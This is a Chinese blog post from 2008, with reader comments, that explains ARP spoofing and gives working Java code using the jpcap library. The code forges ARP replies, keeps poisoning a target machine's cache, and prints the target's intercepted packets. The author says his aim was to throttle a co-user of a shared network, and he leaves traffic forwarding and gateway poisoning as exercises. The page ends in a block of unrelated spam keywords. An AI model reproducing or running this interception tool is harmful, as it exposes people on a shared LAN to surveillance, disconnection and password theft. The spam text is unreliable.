<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    Rexcj

    做牛B的事,讓傻B們說去吧。

    使用JAVA通過ARP欺騙實現數據封包監聽

            如果說最近有什么不爽的事情,那就是與人共享網絡的痛苦了,特別是當其他共享者使用那些P2P工具下載軟件,而你卻看著網頁進度條一點點爬的時候,那種痛苦對于我這種網蟲級別的人來說,那簡直就是痛不欲生。絕對不能再忍了,于是乎上網下載P2P終結者,哼,你們不仁我則不義,看誰厲害。軟件下好后,立刻啟動監控,然后嘗試了下速度,哇,那個爽啊。可惜好景不長,沒多久對方就跑來問我為什么他們斷網了?我楞了一下,那垃圾軟件居然連對方的網都斷了,于是支支唔唔的應付了他,說我看下,總算勉強過關,還好他們不懂電腦,不然就掉大了(貌視挺卑鄙的,別BS俺,俺也是迫不得已)。

           沒辦法,那破爛軟件居然連人家網都斷了,我僅僅只是想給他們限速而已(還算有點良心),仔細查看了下文檔,使用的方式都沒問題啊,為什么會這樣呢?想了半天也毫無頭緒,沒辦法,看來只能自己動手了,于是乎上網找了些關于這方面的資料看了下,也寫了一點代碼做試驗,由于時間有限也只寫了一點,不過總體的做法大概是有所了解,在這里就寫一篇文章大概記錄一下自己的做法,以便作為日記又可與大眾分享下。

           其實目前網絡上類似P2P終結者這類軟件,主要都是基于ARP欺騙實現的,網絡上到處都有關于ARP欺騙的介紹,不過為了本文讀者不需要再去查找,我就在這里大概講解一下。

           ARPAddress Resolution Protocol)既地址解釋協議,主要的目的是用于進行IPMAC地址解釋的。IP是網絡層協議,而MAC是被數據鏈路層使用。網絡中兩個節點要進行通信,那么首先發送端必須要知道源和目的地的MAC地址,而網絡層是使用IP地址,所以要獲得MAC地址,就必須通過IP地址獲取對應的MAC地址,這樣就需要使用ARP協議將IP地址轉換為MAC地址,而同時為了能夠快速的找到目的地的MAC地址,每個節點都會有一個ARP緩存,用于保存已經轉好好的MAC地址,大家可以在控制臺下使用arp –a指令查看arp緩存表。

           ARP具體過程就是當需要通過IP獲取一個遠端的的MAC地址的時候,系統會首先檢查ARP表中是否存在對應的IP地址,如果沒有,則發送一個ARP廣播,當某一個擁有這個MAC地址的節點收到ARP請求的時候,會創建一個ARP reply包,并發送到ARP請求的源節點,ARP Reply包中就包含了目的地節點的MAC地址,在源節點接受到這個reply后,會將目的地節點的MAC地址保存在ARP緩存表中,下一次再次請求同一IP地址的時候,系統將會從ARP表中直接獲取目的地MAC地址,而不需要再次發送ARP廣播。

           看到這里,ARP的具體過程大概講解了一遍,希望能夠解釋清楚。相信有心的朋友一定已經開始考慮ARP欺騙的原理了吧,其實就是利用ARP表進行ARP欺騙,比如一臺局域網內的機器A,通過網關B進行internet連接,而它的arp表中保存著網關BIPMAC地址對,如下:

    192.168.1.1    >    MAC1(懶得寫那么長了,就以MAC1作為MAC地址了)

    那么也就是說,當A想上網的時候,他所有的數據都將先發送到網關再由網關轉發出去,那么A的數據首先會通過192.168.1.1找到網關的MAC地址MAC1,然后就可把數據發送到網關了。此時你的機器是CMAC地址是MAC2,你想通過ARP欺騙來獲取A傳輸的數據,那么你所需要做的事情其實很簡單,就是將機器AARP表中192.168.1.1對應的MAC地址MAC1改成MAC2即可,這樣子機器A所有發送到192.168.1.1的數據就會發到MAC地址為MAC2的機器上,也就是你的機器上了。

    要更改APR表的記錄,辦法就是偽造一個ARP reply包發送給機器A,而這個ARP reply包中的源IP192.168.1.1MAC地址為MAC2既你的機器的MAC地址即可,機器A接受到后就會將這個源IPMAC刷新到它的ARP緩存表中,覆蓋原有的記錄,最終這樣就可以達到ARP欺騙的目的了。

    講到這里不知道大家是否對ARP欺騙有所了解呢?如果再不了解那就上網搜搜吧,網上很多相關的資料。好了,原理講完了,那就輪到實現了,通過JAVA又如何實現ARP欺騙呢?

    從頭到尾來做,當然不是我的作風,JAVA社區那么龐大,我么應該好好利用,要站在巨人的肩膀上成功嘛,呵呵。有一個開源項目JPCAP,這個項目提供一個中間層接口讓使用者可以調用如wincap/libpcap這些庫對網絡傳輸進行控制,具體可到官方網站查看其文檔。

    在這里,我實現了一個簡單的封包截取程序,根據ARP欺騙的原理,我們所需要做的事情如下:

    1、 構建一個ARP Reply

    2、 將該封包發送到需要欺騙的機器

    代碼如下:

    public class LocalListener {

        
    private final static String GATE_IP = "192.168.11.1";
      
    private final static byte[] GATE_MAC = {0x000x0a, (byte0xc50x420x6e, (byte0x9a};
        
    private JpcapCaptor jpcap;                                        //與設備的連接
        private JpcapSender sender;                                     //用于發送的實例
        private Packet replyPacket;                                      //ARP reply包
        private NetworkInterface device;                           //當前機器網卡設備
       
    private IpMacMap targetIpMacMap;                        //目的地IP MAC對

        
    public LocalListener(IpMacMap target) throws Exception {
            NetworkInterface[] devices 
    = JpcapCaptor.getDeviceList();               device = devices[1];
            
    this.targetIpMacMap = target;
            initSender();
            initPacket();
        }


        
    private void initSender() throws Exception {
            jpcap 
    = JpcapCaptor.openDevice(device, 2000false10000);    //打開與設備的連接
            jpcap.setFilter("ip"true);                                //只監聽ip數據包
            sender = jpcap.getJpcapSenderInstance();
        }


        
    private void initPacket() throws Exception {
           
    //reply包的源IP和MAC地址,此IP-MAC對將會被映射到ARP表
            IpMacMap targetsSd = new IpMacMap(GATE_IP, device.mac_address);  
            
    //創建修改目標機器ARP的包
            replyPacket = ARPPacketGern.genPacket(targetIpMacMap, targetsSd); 
            
    //創建以太網頭信息,并打包進reply包
            replyPacket.datalink = EthernetPacketGern.genPacket(targetIpMacMap.getMac(),
                    device.mac_address);
        }


        
    public void listen() throws InterruptedException{
            Thread t 
    = new Thread(new Runnable() {
                
    public void run() {
                 
    //發送reply封包,修改目的地arp表, arp表會在一段時間內被更新,所以需要不停發送
                    while(true){
                        send();  
                        
    try {
                            Thread.sleep(
    500);
                        }
     catch (InterruptedException ex) {
                            Logger.getLogger(LocalListener.
    class.getName()).log(Level.SEVERE, null, ex);
                        }

                    }

                }

            }
    );
            t.start();
            
    //截獲當前網絡設備的封包收發信息
            while(true){
                IPPacket ipPacket 
    = (IPPacket)jpcap.getPacket();
                System.out.println(ipPacket);
            }

        }
    }



    //IP-MAC實體,只用于保存一對IP-MAC地址
    public class IpMacMap {
        
    private String ip;
        
    private byte[] mac;

        
    public IpMacMap(){
        }

        
        
    public IpMacMap(String ip, byte[] mac){
            
    this.ip = ip;
            
    this.mac = mac;
        }

        
        
    public String getIp() {
            
    return ip;
        }


        
    public void setIp(String ip) {
            
    this.ip = ip;
        }


        
    public byte[] getMac() {
            
    return mac;
        }


        
    public void setMac(byte[] mac) {
            
    this.mac = mac;
        }
       
        
    }


    //ARP reply包生成類,用于根據目的地址和源地址生成reply包
    public class ARPPacketGern{

        
    public static ARPPacket genPacket(IpMacMap target, IpMacMap sender) throws Exception{
            ARPPacket arpTarget 
    = new ARPPacket();
            arpTarget.hardtype 
    = ARPPacket.HARDTYPE_ETHER;  //選擇以太網類型(Ethernet)
            arpTarget.prototype = ARPPacket.PROTOTYPE_IP;         //選擇IP網絡協議類型
            arpTarget.operation = ARPPacket.ARP_REPLY;              //選擇REPLY類型
            arpTarget.hlen = 6;                              //MAC地址長度固定6個字節
            arpTarget.plen = 4;                              //IP地址長度固定4個字節
            arpTarget.target_hardaddr = target.getMac();
            arpTarget.target_protoaddr 
    = InetAddress.getByName(target.getIp()).getAddress();
            arpTarget.sender_hardaddr 
    = sender.getMac();
            arpTarget.sender_protoaddr 
    = InetAddress.getByName(sender.getIp()).getAddress();
            
    return arpTarget;
        }

    }






    //根據目的地MAC和源MAC構建以太網頭信息,用于傳輸數據
    public class EthernetPacketGern{
        
    public static EthernetPacket genPacket(byte[] targetMac, byte[] senderMac) throws Exception {
            EthernetPacket ethToTarget 
    = new EthernetPacket();           //創建一個以太網頭
            ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;   //選擇以太包類型
            ethToTarget.dst_mac = targetMac;
            ethToTarget.src_mac 
    = senderMac;        
            
    return ethToTarget;
        }

    }



     

        如上代碼實現了創建一個發送到IP192.168.11.4的機器的ARP reply封包,其中可看到,reply包中的源IP192.168.11.1,而源MAC則被改成當前機器的MAC地址,既device.mac_address,這樣當192.168.11.4的機器接收到該reply包后,就會刷新ARP表,并且所有發送往192.168.11.1的數據都會實際發送到當前運行該程序的機器。程序中創建了一個線程用于循環發送reply封包,主要是因為ARP表會在一定時間內更新,所以要不停的發送才能保證其MAC地址時刻都是被改變的。同時主線程用于監聽并打印當前設備的所有IP數據包信息,本來此方法只能監聽到本機數據包的信息,但由于使用了ARP欺騙,所以你會在192.168.11.4發送數據到192.168.11.1的時候截獲其數據包,并看到類似如下的信息:

    1216798614:885583 /192.168.11.4->/61.135.189.33 protocol(6) priority(0) hop(128) offset(0) ident(34922) TCP 1337 > 8016 seq(1062321893) win(65535) S

        其實上例程序雖然可以截獲并監聽192.168.11.4的數據包,但是如果真的運行起來后,192.168.11.4的機器將會無法上網(假設該機器通過192.168.11.1作為網關上網),這又是為何呢?

        這就是因為本機截獲了192.168.11.4的封包,但是卻沒有將封包轉發出去,所以實際上數據包到了你的機器上后就被中斷了,數據包無法發送出去。既然要監聽對方機器,當然不能讓對方知道啦,如果你監聽了那臺機器,卻導致對方無法上網,傻子也知道有問題啦,所以以上程序仍然要加個補充,那就是將封包數據在轉發到192.168.11.1上,只要將截獲的封包再send出去就可以了,具體如何做就留給大家想吧,困了,休息了,如果有朋友有興趣又實在想不出如何做的話,可以向我提出來,有必要的話,下次再貼一個完整點的例子吧。

        對了,最后還有補充的地方,那就是我們可以通過同樣的方式刷新網關的ARP,這樣網關接受到的數據也會被本機截獲,同樣再通過本機轉發到目的機器即可。這樣對方既可正常上網,而我們又可截獲對方的數據包,如果要進行限速的話,那就是在截獲封包的同時,進行一定的延時,比如一秒只允許多少K的數據通過,都可以在這里做手腳,同樣的,具體如何留給大家想吧,^ o ^



    posted on 2008-07-23 16:05 Rexcj 閱讀(5147) 評論(12)  編輯  收藏

    Feedback

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 16:56 殘夢追月

    呵呵,讓我打開眼界了啊!  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 16:56 殘夢追月

    先訂閱啦!  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 17:26 隔葉黃鶯

    樓主真的太不義了,ARP本來就是常常用來騙取密碼的,不過現在敏敢性的口令,QQ,如銀行的都會加密,你大約是不知道的。但是像郵箱登錄密碼名和密碼豈不讓你全窺了去,再根據普通人使用密碼的習慣,銀行的密碼怕是也能猜得出幾分來。
    局域網對于這種ARP欺騙的病毒可是深惡痛絕,中毒者上網上得其樂融融,卻害死了一大片,關鍵那病毒還可能把截取到的敏敢信息發了出去。  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 17:44 Rexcj

    我對于數據的竊取倒沒什么興趣,對于這篇文章只是純粹站在技術性的角度上考慮,我開始的目的也僅僅是為了限制其他人的速度,沒辦法,我對BT這類P2P工具是深惡痛絕,技術不分善惡,善惡只在于人心,況且了解技術的原理對于防范是很有好處的,如果有時間我仍然會繼續研究其他的網絡協議,但也純粹是基于興趣。  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 17:48 Jarod.cn.LuLuLife

    很好,支持一個  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 18:11 yz

    很好,支持一個,期待下文,以及代碼,謝謝  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 18:22 隔葉黃鶯

    現在能說得上 OSI 的七層模型的已不多,其中還有些是硬背下來的,根本沒理解各層的職責。從高層應用做協議相關的開發,聽說過 DoD 的四層模型的應該也不多。  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 20:26 Always BaNg.

    強悍阿,爭取搞一個免費軟件出來我們用用:)  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽[未登錄] 2008-07-23 22:10 火焰出林

    不錯,樓主可以加QQ嗎,以后多交流,我QQ:20481378  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 23:09 隔葉黃鶯

    這個要系統里安裝了wincap/libpcap,分別對應的是 Windows和 Unix族(包括Linux)系統,然后還要下載開源的 jpcap,在 sourceforge 上有,可惜現在大多數人是上不了的,期待奧運后重新開放--其實是有賴于 NotePad++ 行事了。

    wincap 是要用 setup 安裝的,光幾個動態庫還不行,就是說要注冊動態庫的。jpcap 其實是 jni 的實現,它為兩種常用的平臺分別提供了 .dll 文件和 .so 文件。

    不知我說的對不,我原來試圖用過一下 jpcap,但后來實際沒這么去用。如果是網絡協議,下到更低一層去,C++ 會是更好的選擇,因為 C++ 有可用的類庫為更底層的協議數據報定義了相應的數據結構,使用起來更方便些。

    但是,一般 wincap/libpcap 這個東西恐怕還是免不了的,不然就會有更多單調的事情要做的。原來做網絡管理軟件,現在也感覺很生疏了。  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-23 23:24 Rexcj

    隔葉黃鶯 說的不錯,你對這些比我了解多了,我純粹是個業余水平,呵呵。

    我在文章前面也說了,jpcap實際上只是提供了一層接口,具體的底層實現仍然是依靠wincap/libpcap的,只有這樣,jpcap才能在多個系統下使用,目前有很多系統都提供了支持,具體哪些我就不記得了。

    至于說到底層開發所使用的語言,那當然是C/C++更適合,JAVA畢竟運行在虛擬機上,不如C/C++來的直接和方便,當然不同系統也不得不寫不同的實現。  回復  更多評論   

    # re: 使用JAVA通過ARP欺騙實現數據封包監聽 2008-07-30 11:48 代理163

    大開眼界!  回復  更多評論   



    只有注冊用戶登錄后才能發表評論。


    網站導航:
     

    My Links

    Blog Stats

    常用鏈接

    留言簿(1)

    隨筆檔案

    搜索

    積分與排名

    最新評論

    閱讀排行榜

    評論排行榜

    主站蜘蛛池模板: 亚洲夂夂婷婷色拍WW47| 亚洲男人的天堂在线| 免费观看亚洲人成网站| 成年女人午夜毛片免费看| 亚洲欧美成人综合久久久| 国产午夜免费福利红片| 极品色天使在线婷婷天堂亚洲 | 成年午夜视频免费观看视频| 亚洲国产模特在线播放| 久久综合AV免费观看| 亚洲国产成人久久综合| heyzo亚洲精品日韩| 中文字幕视频免费在线观看| 久久夜色精品国产亚洲AV动态图 | 美女视频黄a视频全免费网站色| 国产免费直播在线观看视频| 四虎一区二区成人免费影院网址 | 亚洲色大18成人网站WWW在线播放 亚洲色大成WWW亚洲女子 | 乱爱性全过程免费视频| 亚洲人色婷婷成人网站在线观看| 无码国产精品一区二区免费vr| 亚洲丰满熟女一区二区v| 国产色婷婷精品免费视频| 一个人看的在线免费视频| 久久精品国产亚洲AV果冻传媒| 黄网站色在线视频免费观看| 亚洲爆乳少妇无码激情| 亚洲无人区一区二区三区| 中文字幕在线免费| 国产精品观看在线亚洲人成网| 国产亚洲精品a在线观看 | 女人与禽交视频免费看| 一区二区三区免费高清视频| 亚洲美免无码中文字幕在线| 午夜dj免费在线观看| 中文字幕无线码免费人妻| 亚洲国产高清视频在线观看| 男人的天堂亚洲一区二区三区| 免费看黄网站在线看| 亚洲最新中文字幕| 亚洲国产一成久久精品国产成人综合 |